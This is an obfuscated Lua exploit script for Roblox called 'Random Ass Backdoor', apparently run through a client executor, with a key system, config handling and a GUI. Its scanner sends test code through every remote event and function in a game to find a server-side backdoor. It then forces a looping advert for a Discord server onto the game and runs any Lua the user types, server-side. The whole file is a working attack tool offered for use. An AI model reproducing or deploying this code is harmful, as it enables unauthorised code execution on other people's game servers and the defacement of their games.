--[[
______                _                    ___           ______            _       _                  
| ___ \              | |                  / _ \          | ___ \          | |     | |                 
| |_/ /__ _ _ __   __| | ___  _ __ ___   / /_\ \___ ___  | |_/ / __ _  ___| | ____| | ___   ___  _ __ 
|    // _` | '_ \ / _` |/ _ \| '_ ` _ \  |  _  / __/ __| | ___ \/ _` |/ __| |/ / _` |/ _ \ / _ \| '__|
| |\ \ (_| | | | | (_| | (_) | | | | | | | | | \__ \__ \ | |_/ / (_| | (__|   < (_| | (_) | (_) | |   
\_| \_\__,_|_| |_|\__,_|\___/|_| |_| |_| \_| |_/___/___/ \____/ \__,_|\___|_|\_\__,_|\___/ \___/|_|
              Random Ass Backdoor (Version Config) - By exvy
]]--

local v0=game:GetService("Players");local v1=v0.LocalPlayer;local v2=v1:WaitForChild("PlayerGui");local v3=game:GetService("HttpService");local v4={DevMode=false,DevKey="Dev.Test",Premium=false,GuiColor=Color3.fromRGB(0,0,0),TopBarEnabled=false,AutoInject=false,RainbowText=true,RainbowSpeed=0.03,DefaultScript="Discord: envysplague",CloseButtonColor=Color3.fromRGB(255,0,0),ButtonBackgroundColor=Color3.fromRGB(44,44,44),TextBackgroundColor=Color3.fromRGB(44,44,44),TextBackgroundTransparency=0.5,NotificationEnabled=true,NotificationDuration=6,NotificationTitle="Backdoor Scanner",ScanTimeout=10,MaxScanAttempts=100,ScanDelay=0.1,ToggleGUIKey="LeftAlt",ExecuteScriptKey="F5",ClearTextBoxKey="F6"};local function v5() local v15={DevMode=v4.DevMode,DevKey=v4.DevKey,Premium=v4.Premium,GuiColor={R=v4.GuiColor.R,G=v4.GuiColor.G,B=v4.GuiColor.B},TopBarEnabled=v4.TopBarEnabled,AutoInject=v4.AutoInject,RainbowText=v4.RainbowText,RainbowSpeed=v4.RainbowSpeed,DefaultScript=v4.DefaultScript,CloseButtonColor={R=v4.CloseButtonColor.R,G=v4.CloseButtonColor.G,B=v4.CloseButtonColor.B},ButtonBackgroundColor={R=v4.ButtonBackgroundColor.R,G=v4.ButtonBackgroundColor.G,B=v4.ButtonBackgroundColor.B},TextBackgroundColor={R=v4.TextBackgroundColor.R,G=v4.TextBackgroundColor.G,B=v4.TextBackgroundColor.B},TextBackgroundTransparency=v4.TextBackgroundTransparency,NotificationEnabled=v4.NotificationEnabled,NotificationDuration=v4.NotificationDuration,NotificationTitle=v4.NotificationTitle,ScanTimeout=v4.ScanTimeout,MaxScanAttempts=v4.MaxScanAttempts,ScanDelay=v4.ScanDelay,ToggleGUIKey=v4.ToggleGUIKey,ExecuteScriptKey=v4.ExecuteScriptKey,ClearTextBoxKey=v4.ClearTextBoxKey};local v16,v17=pcall(function() writefile("Random Ass Backdoor/Config.json",v3:JSONEncode(v15));end);if  not v16 then warn("Failed to create config: "   .. v17 );return false;end return true;end local function v6() if  not isfolder("Random Ass Backdoor") then makefolder("Random Ass Backdoor");end if  not isfile("Random Ass Backdoor/Config.json") then v5();return false;end local v18,v19=pcall(function() return readfile("Random Ass Backdoor/Config.json");end);if v18 then local v238=v3:JSONDecode(v19);for v312,v313 in pairs(v238) do if ((v312=="GuiColor") or (v312=="CloseButtonColor") or (v312=="ButtonBackgroundColor") or (v312=="TextBackgroundColor")) then v4[v312]=Color3.new(v313.R,v313.G,v313.B);else v4[v312]=v313;end end return true;else warn("Failed to parse config: "   .. v19 );v5();return false;end end local function v7() if  not isfolder("Random Ass Backdoor") then makefolder("Random Ass Backdoor");end local v20={DevMode=v4.DevMode,DevKey=v4.DevKey,Premium=v4.Premium,GuiColor={R=v4.GuiColor.R,G=v4.GuiColor.G,B=v4.GuiColor.B},TopBarEnabled=v4.TopBarEnabled,AutoInject=v4.AutoInject,RainbowText=v4.RainbowText,RainbowSpeed=v4.RainbowSpeed,DefaultScript=v4.DefaultScript,CloseButtonColor={R=v4.CloseButtonColor.R,G=v4.CloseButtonColor.G,B=v4.CloseButtonColor.B},ButtonBackgroundColor={R=v4.ButtonBackgroundColor.R,G=v4.ButtonBackgroundColor.G,B=v4.ButtonBackgroundColor.B},TextBackgroundColor={R=v4.TextBackgroundColor.R,G=v4.TextBackgroundColor.G,B=v4.TextBackgroundColor.B},TextBackgroundTransparency=v4.TextBackgroundTransparency,NotificationEnabled=v4.NotificationEnabled,NotificationDuration=v4.NotificationDuration,NotificationTitle=v4.NotificationTitle,ScanTimeout=v4.ScanTimeout,MaxScanAttempts=v4.MaxScanAttempts,ScanDelay=v4.ScanDelay,ToggleGUIKey=v4.ToggleGUIKey,ExecuteScriptKey=v4.ExecuteScriptKey,ClearTextBoxKey=v4.ClearTextBoxKey};local v21,v22=pcall(function() writefile("Random Ass Backdoor/Config.json",v3:JSONEncode(v20));end);if  not v21 then warn("Config save error: "   .. v22 );return false;end return true;end v6();local v8={"leakingdontwork?","HttpService","PremiumVersion"};local function v9(v23) if (v4.DevMode or (v23==v4.DevKey)) then return true,"dev";end for v147,v148 in ipairs(v8) do if (v23==v148) then if (v148=="PremiumVersion") then return true,"premium";else return true,"standard";end end end return false,"invalid";end local function v10() if  not isfolder("Random Ass Backdoor") then makefolder("Random Ass Backdoor");end end local function v11(v24) local v25,v26=v9(v24);if  not v25 then return false;end v10();local v27,v28=pcall(function() writefile("Random Ass Backdoor/key.txt",v24);end);if  not v27 then warn("save error: "   .. v28 );return false;end if (v26=="premium") then v4.Premium=true;v7();end return true;end local function v12() v10();if  not isfile("Random Ass Backdoor/key.txt") then return nil;end local v29,v30=pcall(function() return readfile("Random Ass Backdoor/key.txt");end);if v29 then return v30;end return nil;end local function v13() local v31=Instance.new("ScreenGui");v31.Name="BackdoorGUI";v31.ResetOnSpawn=false;v31.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v31.Parent=v2;local v37=Instance.new("Frame");v37.Parent=v31;v37.BackgroundColor3=v4.GuiColor;v37.BorderColor3=Color3.fromRGB(0,0,0);v37.BorderSizePixel=0;v37.Position=UDim2.new(0.248322144,0,0.35603112,0);v37.Size=UDim2.new(0,305,0,185);v37.Active=true;v37.Draggable=v4.TopBarEnabled;local v48=Instance.new("UICorner");v48.CornerRadius=UDim.new(0,3);v48.Parent=v37;local v51=Instance.new("TextLabel");v51.Parent=v37;v51.BackgroundColor3=Color3.fromRGB(255,255,255);v51.BackgroundTransparency=1;v51.BorderColor3=Color3.fromRGB(0,0,0);v51.BorderSizePixel=0;v51.Position=UDim2.new(0.144262299,0,0,0);v51.Size=UDim2.new(0,252,0,50);v51.Font=Enum.Font.SourceSans;v51.Text="Random Ass Backdoor";v51.TextColor3=Color3.fromRGB(255,255,255);v51.TextSize=25;v51.TextXAlignment=Enum.TextXAlignment.Left;local v66=Instance.new("ImageLabel");v66.Parent=v37;v66.BackgroundColor3=Color3.fromRGB(255,255,255);v66.BackgroundTransparency=1;v66.BorderColor3=Color3.fromRGB(0,0,0);v66.BorderSizePixel=0;v66.Size=UDim2.new(0,50,0,50);v66.Image="rbxasset://textures/ui/GuiImagePlaceholder.png";local v74=Instance.new("TextBox");v74.Parent=v37;v74.BackgroundColor3=v4.TextBackgroundColor;v74.BackgroundTransparency=v4.TextBackgroundTransparency;v74.BorderColor3=Color3.fromRGB(0,0,0);v74.BorderSizePixel=0;v74.Position=UDim2.new(0.321311474,0,0.270270258,0);v74.Size=UDim2.new(0,198,0,124);v74.Font=Enum.Font.SourceSans;v74.Text=v4.DefaultScript;v74.TextColor3=Color3.fromRGB(0,0,0);v74.TextSize=14;v74.TextXAlignment=Enum.TextXAlignment.Left;v74.TextYAlignment=Enum.TextYAlignment.Top;local v92=Instance.new("TextButton");v92.Parent=v37;v92.BackgroundColor3=v4.ButtonBackgroundColor;v92.BorderColor3=Color3.fromRGB(0,0,0);v92.BorderSizePixel=0;v92.Position=UDim2.new(0.0262295082,0,0.74594593,0);v92.Size=UDim2.new(0,75,0,36);v92.Font=Enum.Font.SourceSans;v92.Text="Execute";v92.TextColor3=Color3.fromRGB(0,0,0);v92.TextSize=20;local v104=Instance.new("TextButton");v104.Parent=v37;v104.BackgroundColor3=v4.ButtonBackgroundColor;v104.BorderColor3=Color3.fromRGB(0,0,0);v104.BorderSizePixel=0;v104.Position=UDim2.new(0.0262295082,0,0.270270258,0);v104.Size=UDim2.new(0,75,0,36);v104.Font=Enum.Font.SourceSans;v104.Text="Clear";v104.TextColor3=Color3.fromRGB(0,0,0);v104.TextSize=20;local v115=Instance.new("TextButton");v115.Parent=v37;v115.BackgroundColor3=v4.ButtonBackgroundColor;v115.BorderColor3=Color3.fromRGB(0,0,0);v115.BorderSizePixel=0;v115.Position=UDim2.new(0.0262295082,0,0.508108079,0);v115.Size=UDim2.new(0,75,0,36);v115.Font=Enum.Font.SourceSans;v115.Text="Inject";v115.TextColor3=Color3.fromRGB(0,0,0);v115.TextSize=20;local v126=Instance.new("TextButton");v126.Parent=v37;v126.BackgroundColor3=Color3.fromRGB(255,255,255);v126.BackgroundTransparency=1;v126.BorderColor3=Color3.fromRGB(0,0,0);v126.BorderSizePixel=0;v126.Position=UDim2.new(0.885245919,0,0,0);v126.Size=UDim2.new(0,35,0,35);v126.Font=Enum.Font.SourceSans;v126.Text="x";v126.TextColor3=v4.CloseButtonColor;v126.TextSize=30;v126.TextYAlignment=Enum.TextYAlignment.Top;local v140;if v4.Premium then v140=Instance.new("TextButton");v140.Parent=v37;v140.BackgroundColor3=v4.ButtonBackgroundColor;v140.BorderColor3=Color3.fromRGB(0,0,0);v140.BorderSizePixel=0;v140.Position=UDim2.new(0.3,0,0.74594593,0);v140.Size=UDim2.new(0,75,0,36);v140.Font=Enum.Font.SourceSans;v140.Text="Settings";v140.TextColor3=Color3.fromRGB(0,0,0);v140.TextSize=14;v140.Visible=v4.Premium;end local function v141() local v149=Instance.new("LocalScript",v37);local v150=v149.Parent;local v151=game:GetService("UserInputService");local v152=false;local v153;local v154;local v155;local function v156(v254) local v255=v254.Position-v154 ;v150.Position=UDim2.new(v155.X.Scale,v155.X.Offset + v255.X ,v155.Y.Scale,v155.Y.Offset + v255.Y );end v150.InputBegan:Connect(function(v257) if ((v257.UserInputType==Enum.UserInputType.MouseButton1) or (v257.UserInputType==Enum.UserInputType.Touch)) then v152=true;v154=v257.Position;v155=v150.Position;v257.Changed:Connect(function() if (v257.UserInputState==Enum.UserInputState.End) then v152=false;end end);end end);v150.InputChanged:Connect(function(v258) if ((v258.UserInputType==Enum.UserInputType.MouseMovement) or (v258.UserInputType==Enum.UserInputType.Touch)) then v153=v258;end end);v151.InputChanged:Connect(function(v259) if ((v259==v153) and v152) then v156(v259);end end);end coroutine.wrap(v141)();if v4.RainbowText then local function v260() local v314=Instance.new("LocalScript",v51);local v315=v314.Parent;local v316=0;while true do v316=v316 + 0.01 ;if (v316>1) then v316=0;end v315.TextColor3=Color3.fromHSV(v316,1,1);task.wait(v4.RainbowSpeed);end end coroutine.wrap(v260)();end local function v142() local v157=Instance.new("LocalScript",v66);local v158=game:GetService("Players");local v159=v158.LocalPlayer;local v160=v157.Parent;if (v160 and v159) then local v317=v159.UserId;local v318="https://www.roblox.com/avatar-thumbnail/image?userId="   .. v317   .. "&width=420&height=420&format=png&type=bust" ;v160.Image=v318;end end coroutine.wrap(v142)();if v4.RainbowText then local function v261() local v320=Instance.new("LocalScript",v74);local v321=v320.Parent;local v322=0;while true do v322=v322 + 0.01 ;if (v322>1) then v322=0;end v321.TextColor3=Color3.fromHSV(v322,1,1);task.wait(v4.RainbowSpeed);end end coroutine.wrap(v261)();end local function v143() local v161=Instance.new("LocalScript",v74);local v162=v161.Parent;local v163=game:GetService("UserInputService");v162.TextWrapped=true;v162.MultiLine=true;local v166;local function v167(v262,v263) if ((v262.UserInputType==Enum.UserInputType.Keyboard) and (v262.KeyCode==Enum.KeyCode.Return)) then v162:ReleaseFocus();end end v162.Focused:Connect(function() v166=v163.InputBegan:Connect(v167);end);v162.FocusLost:Connect(function() if v166 then v166:Disconnect();v166=nil;end end);end coroutine.wrap(v143)();if v4.RainbowText then local function v264() local v323=Instance.new("LocalScript",v92);local v324=v323.Parent;local v325=0;while true do v325=v325 + 0.01 ;if (v325>1) then v325=0;end v324.TextColor3=Color3.fromHSV(v325,1,1);task.wait(v4.RainbowSpeed);end end coroutine.wrap(v264)();end if v4.RainbowText then local function v265() local v326=Instance.new("LocalScript",v104);local v327=v326.Parent;local v328=0;while true do v328=v328 + 0.01 ;if (v328>1) then v328=0;end v327.TextColor3=Color3.fromHSV(v328,1,1);task.wait(v4.RainbowSpeed);end end coroutine.wrap(v265)();end if v4.RainbowText then local function v266() local v329=Instance.new("LocalScript",v115);local v330=v329.Parent;local v331=0;while true do v331=v331 + 0.01 ;if (v331>1) then v331=0;end v330.TextColor3=Color3.fromHSV(v331,1,1);task.wait(v4.RainbowSpeed);end end coroutine.wrap(v266)();end local function v144() local v168=Instance.new("LocalScript",v126);v168.Parent.MouseButton1Click:Connect(function() v168.Parent.Parent.Visible=false;end);end coroutine.wrap(v144)();local function v145() local v169=Instance.new("LocalScript",v37);local v170=v169.Parent.Parent;v170.ResetOnSpawn=false;end coroutine.wrap(v145)();if (v4.Premium and v140) then if v4.RainbowText then local function v432() local v448=Instance.new("LocalScript",v140);local v449=v448.Parent;local v450=0;while true do v450=v450 + 0.01 ;if (v450>1) then v450=0;end v449.TextColor3=Color3.fromHSV(v450,1,1);task.wait(v4.RainbowSpeed);end end coroutine.wrap(v432)();end v140.MouseButton1Click:Connect(function() local v332=Instance.new("ScreenGui");v332.Name="SettingsGUI";v332.Parent=v2;v332.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;local v337=Instance.new("Frame");v337.Parent=v332;v337.BackgroundColor3=v4.GuiColor;v337.BorderColor3=Color3.fromRGB(0,0,0);v337.BorderSizePixel=0;v337.Position=UDim2.new(0.3,0,0.3,0);v337.Size=UDim2.new(0,250,0,200);v337.Active=true;v337.Draggable=true;local v347=Instance.new("UICorner");v347.CornerRadius=UDim.new(0,3);v347.Parent=v337;local v350=Instance.new("TextLabel");v350.Parent=v337;v350.BackgroundColor3=Color3.fromRGB(255,255,255);v350.BackgroundTransparency=1;v350.BorderColor3=Color3.fromRGB(0,0,0);v350.BorderSizePixel=0;v350.Position=UDim2.new(0.1,0,0,0);v350.Size=UDim2.new(0,200,0,30);v350.Font=Enum.Font.SourceSans;v350.Text="Premium Settings";v350.TextColor3=Color3.fromRGB(255,255,255);v350.TextSize=20;local v363=Instance.new("TextLabel");v363.Parent=v337;v363.BackgroundColor3=Color3.fromRGB(255,255,255);v363.BackgroundTransparency=1;v363.BorderColor3=Color3.fromRGB(0,0,0);v363.BorderSizePixel=0;v363.Position=UDim2.new(0.1,0,0.2,0);v363.Size=UDim2.new(0,100,0,20);v363.Font=Enum.Font.SourceSans;v363.Text="GUI Color:";v363.TextColor3=Color3.fromRGB(255,255,255);v363.TextSize=14;local v375=Instance.new("TextBox");v375.Parent=v337;v375.BackgroundColor3=Color3.fromRGB(44,44,44);v375.BackgroundTransparency=0.5;v375.BorderColor3=Color3.fromRGB(0,0,0);v375.BorderSizePixel=0;v375.Position=UDim2.new(0.1,0,0.3,0);v375.Size=UDim2.new(0,100,0,20);v375.Font=Enum.Font.SourceSans;v375.Text=tostring(math.floor(v4.GuiColor.R * 255 ))   .. ","   .. tostring(math.floor(v4.GuiColor.G * 255 ))   .. ","   .. tostring(math.floor(v4.GuiColor.B * 255 )) ;v375.TextColor3=Color3.fromRGB(255,255,255);v375.TextSize=12;local v387=Instance.new("TextButton");v387.Parent=v337;v387.BackgroundColor3=Color3.fromRGB(44,44,44);v387.BorderColor3=Color3.fromRGB(0,0,0);v387.BorderSizePixel=0;v387.Position=UDim2.new(0.1,0,0.5,0);v387.Size=UDim2.new(0,100,0,30);v387.Font=Enum.Font.SourceSans;v387.Text="Save Settings";v387.TextColor3=Color3.fromRGB(255,255,255);v387.TextSize=14;local v398=Instance.new("TextButton");v398.Parent=v337;v398.BackgroundColor3=Color3.fromRGB(255,0,0);v398.BorderColor3=Color3.fromRGB(0,0,0);v398.BorderSizePixel=0;v398.Position=UDim2.new(0.8,0,0,0);v398.Size=UDim2.new(0,30,0,30);v398.Font=Enum.Font.SourceSans;v398.Text="X";v398.TextColor3=Color3.fromRGB(255,255,255);v398.TextSize=14;v398.MouseButton1Click:Connect(function() v332:Destroy();end);v387.MouseButton1Click:Connect(function() local v433=v375.Text;local v434,v435,v436=v433:match("(%d+),(%d+),(%d+)");if (v434 and v435 and v436) then v434=math.clamp(tonumber(v434),0,255);v435=math.clamp(tonumber(v435),0,255);v436=math.clamp(tonumber(v436),0,255);v4.GuiColor=Color3.fromRGB(v434,v435,v436);v37.BackgroundColor3=v4.GuiColor;v337.BackgroundColor3=v4.GuiColor;v7();v387.Text="Saved!";task.wait(1);v387.Text="Save Settings";else v387.Text="Invalid Format!";task.wait(1);v387.Text="Save Settings";end end);end);end local function v146() local v172={"a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"};local v173=nil;local v174=false;local function v175(v268,v269) local v270=print;if (v269==1) then v270=print;end if (v269==2) then v270=error;end if (v269==3) then v270=warn;end v270("Backdoor Scanner: "   .. v268 );end local function v176(v271) if v4.NotificationEnabled then game:GetService("StarterGui"):SetCore("SendNotification",{Title=v4.NotificationTitle,Duration=v4.NotificationDuration,Text=v271});end end local function v177(v272,v273) if v272:IsA("RemoteEvent") then v272:FireServer(v273);elseif v272:IsA("RemoteFunction") then spawn(function() v272:InvokeServer(v273);end);end end local function v178(v274) local v275="";for v409=1,v274 do v275=v275   .. v172[math.random(1, #v172)] ;end return v275;end local function v179() local v276=os.clock();local v277={};local v278;local v279=game:GetService("ReplicatedStorage"):FindFirstChild("lh"   .. ((game.PlaceId/6666) * 1337 * game.PlaceId) );if (v279 and v279:IsA("RemoteFunction")) then while true do v278=v178(math.random(12,30));if  not v277[v278] then break;end end spawn(function() v279:InvokeServer("backdoor scanner","a=Instance.new('Model',workspace)a.Name='"   .. v278   .. "'" );end);v277[v278]=v279;end for v410,v411 in game:GetDescendants() do if  not (v411:IsA("RemoteEvent") or v411:IsA("RemoteFunction")) then continue;end if (string.split(v411:GetFullName(),".")[1]=="RobloxReplicatedStorage") then v175("Roblox Replicated Storage ("   .. v411.Name   .. ")" ,1);continue;end if ((v411.Parent==game:GetService("ReplicatedStorage")) or (v411.Parent.Parent==game:GetService("ReplicatedStorage")) or (v411.Parent.Parent.Parent==game:GetService("ReplicatedStorage"))) then if (v411:FindFirstChild("__FUNCTION") or (v411.Name=="__FUNCTION")) then v175("Adonis filter detected ("   .. v411.Name   .. ")" ,1);continue;end if ((v411.Parent.Parent.Name=="HDAdminClient") and (v411.Parent.Name=="Signals")) then v175("HD Admin ("   .. v411.Name   .. ")" ,1);continue;end if (v411.Parent.Name=="DefaultChatSystemChatEvents") then v175("Chat event ("   .. v411.Name   .. ")" ,1);continue;end end while true do v278=v178(math.random(12,30));if  not v277[v278] then break;end end v177(v411,"a=Instance.new('Model',workspace)a.Name='"   .. v278   .. "'" );v277[v278]=v411;v175('Tested remote "'   .. v411:GetFullName()   .. '"' ,1);end for v413=1,v4.MaxScanAttempts do for v438,v439 in pairs(v277) do if workspace:FindFirstChild(v438) then v176("Backdoor found! "   .. (os.clock() -v276)   .. "s" );v173=v439;v175(v439:GetFullName(),3);v177(v439,"a=Instance.new('Hint')a.Text='Discord: envysplague, Discord.gg/kd9ET5B3TF'while true do a.Parent=workspace;wait(15)a:Remove()wait(30)end");return true;end end wait(v4.ScanDelay);end return false;end v92.MouseButton1Click:Connect(function() local v280=v74.Text;if v173 then v177(v173,v280);v92.Text="Executed!";task.wait(0.5);v92.Text="Execute";else v176("No backdoor found yet!");end end);v104.MouseButton1Click:Connect(function() v74.Text="";v104.Text="Cleared!";task.wait(0.5);v104.Text="Clear";end);v115.MouseButton1Click:Connect(function() if  not v174 then v174=true;v175("Scanning for backdoors...",3);v115.Text="Scanning...";if  not v179() then v115.Text="Failure";v174=false;else v115.Text="Injected";v174=false;end end end);game:GetService("UserInputService").InputBegan:Connect(function(v283,v284) if ((v283.KeyCode==Enum.KeyCode.LeftAlt) and  not v284) then v37.Visible= not v37.Visible;end end);if v4.AutoInject then task.spawn(function() task.wait(1);if  not v174 then v174=true;v175("Auto-injecting...",3);v115.Text="Auto-Injecting...";if  not v179() then v115.Text="Auto-Inject Failed";v174=false;else v115.Text="Auto-Injected";v174=false;end end end);end end v146();end local v14=v12();if ((v14 and v9(v14)) or v4.DevMode) then v13();else local v180=Instance.new("ScreenGui");v180.Name="KeySystem";v180.Parent=v2;local v183=Instance.new("Frame");local v184=Instance.new("TextButton");local v185=Instance.new("TextBox");local v186=Instance.new("TextLabel");v183.Parent=v180;v183.BackgroundColor3=Color3.fromRGB(0,0,0);v183.BorderColor3=Color3.fromRGB(0,0,0);v183.BorderSizePixel=0;v183.Position=UDim2.new(0.14337568,0,0.190661475,0);v183.Size=UDim2.new(0,169,0,165);v183.Active=true;v183.Draggable=true;v184.Parent=v183;v184.BackgroundColor3=Color3.fromRGB(44,44,44);v184.BorderColor3=Color3.fromRGB(0,0,0);v184.BorderSizePixel=0;v184.Position=UDim2.new(0.0662294626,0,0.787391424,0);v184.Size=UDim2.new(0,147,0,28);v184.Font=Enum.Font.SourceSans;v184.Text="Check";v184.TextColor3=Color3.fromRGB(0,0,0);v184.TextSize=20;v185.Parent=v183;v185.BackgroundColor3=Color3.fromRGB(44,44,44);v185.BackgroundTransparency=0.5;v185.BorderColor3=Color3.fromRGB(0,0,0);v185.BorderSizePixel=0;v185.Position=UDim2.new(0.0662294552,0,0.206060603,0);v185.Size=UDim2.new(0,147,0,86);v185.Font=Enum.Font.SourceSans;v185.Text="";v185.TextColor3=Color3.fromRGB(0,0,0);v185.TextSize=14;v185.TextXAlignment=Enum.TextXAlignment.Left;v185.TextYAlignment=Enum.TextYAlignment.Top;v186.Parent=v183;v186.BackgroundColor3=Color3.fromRGB(255,255,255);v186.BackgroundTransparency=1;v186.BorderColor3=Color3.fromRGB(0,0,0);v186.BorderSizePixel=0;v186.Position=UDim2.new(0.0613114387,0,0,0);v186.Size=UDim2.new(0,148,0,35);v186.Font=Enum.Font.SourceSans;v186.Text="Key System";v186.TextColor3=Color3.fromRGB(255,255,255);v186.TextSize=25;v186.TextXAlignment=Enum.TextXAlignment.Left;local function v233() local v285=Instance.new("LocalScript",v184);local v286=v285.Parent;local v287=0;while true do v287=v287 + 0.01 ;if (v287>1) then v287=0;end v286.TextColor3=Color3.fromHSV(v287,1,1);task.wait(0.03);end end coroutine.wrap(v233)();local function v234() local v288=Instance.new("LocalScript",v185);local v289=v288.Parent;local v290=0;while true do v290=v290 + 0.01 ;if (v290>1) then v290=0;end v289.TextColor3=Color3.fromHSV(v290,1,1);task.wait(0.03);end end coroutine.wrap(v234)();local function v235() local v291=Instance.new("LocalScript",v185);local v292=v291.Parent;local v293=game:GetService("UserInputService");v292.TextWrapped=true;v292.MultiLine=true;local v296;local function v297(v416,v417) if ((v416.UserInputType==Enum.UserInputType.Keyboard) and (v416.KeyCode==Enum.KeyCode.Return)) then v292:ReleaseFocus();end end v292.Focused:Connect(function() v296=v293.InputBegan:Connect(v297);end);v292.FocusLost:Connect(function() if v296 then v296:Disconnect();v296=nil;end end);end coroutine.wrap(v235)();local function v236() local v298=Instance.new("LocalScript",v186);local v299=v298.Parent;local v300=0;while true do v300=v300 + 0.01 ;if (v300>1) then v300=0;end v299.TextColor3=Color3.fromHSV(v300,1,1);task.wait(0.03);end end coroutine.wrap(v236)();local function v237() local v301=Instance.new("LocalScript",v183);local v302=v301.Parent;local v303=game:GetService("UserInputService");local v304=false;local v305;local v306;local v307;local function v308(v419) local v420=v419.Position-v306 ;v302.Position=UDim2.new(v307.X.Scale,v307.X.Offset + v420.X ,v307.Y.Scale,v307.Y.Offset + v420.Y );end v302.InputBegan:Connect(function(v422) if ((v422.UserInputType==Enum.UserInputType.MouseButton1) or (v422.UserInputType==Enum.UserInputType.Touch)) then v304=true;v306=v422.Position;v307=v302.Position;v422.Changed:Connect(function() if (v422.UserInputState==Enum.UserInputState.End) then v304=false;end end);end end);v302.InputChanged:Connect(function(v423) if ((v423.UserInputType==Enum.UserInputType.MouseMovement) or (v423.UserInputType==Enum.UserInputType.Touch)) then v305=v423;end end);v303.InputChanged:Connect(function(v424) if ((v424==v305) and v304) then v308(v424);end end);end coroutine.wrap(v237)();v184.MouseButton1Click:Connect(function() local v309=v185.Text:gsub("%s+","");if (v309=="") then v185.Text="please enter a key";task.wait(1.5);v185.Text="";return;end local v310,v311=v9(v309);if v310 then if v11(v309) then v185.Text="key accepted!";v185.TextColor3=Color3.fromRGB(0,255,0);task.wait(1.5);v180:Destroy();v13();end else v185.Text="invalid key";v185.TextColor3=Color3.fromRGB(255,0,0);task.wait(1.5);v185.Text="";v185.TextColor3=Color3.fromRGB(0,0,0);end end);end
